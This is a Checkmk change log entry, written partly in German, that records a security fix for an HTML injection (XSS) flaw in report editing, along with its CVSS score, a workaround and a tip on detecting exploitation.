Werk #13193: XSS in report editing

Komponente Reporting & Availability
Titel XSS in report editing
Datum 24.09.2021
Checkmk-Editon Checkmk Enterprise (CEE)
Checkmk-Version 2.1.0i1 2.0.0p12 1.6.0p26
Level Kleine Änderung
Klasse Sicherheitsfix
Kompatibilität Kompatibel - benötigt kein manuelles Eingreifen

It was possible to Inject HTML code in various Content elments. This could also be used in shared reports.

CVSS: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H 9.0 Affected Versions: all below Workarounds: Disallow users to customize reports (Set 'General Permissions' > 'Customize reports and use them' to no) Exploit detections: Check `var/check_mk/web/*/user_reports.mk` for html specialchars.

Zur Liste aller Werks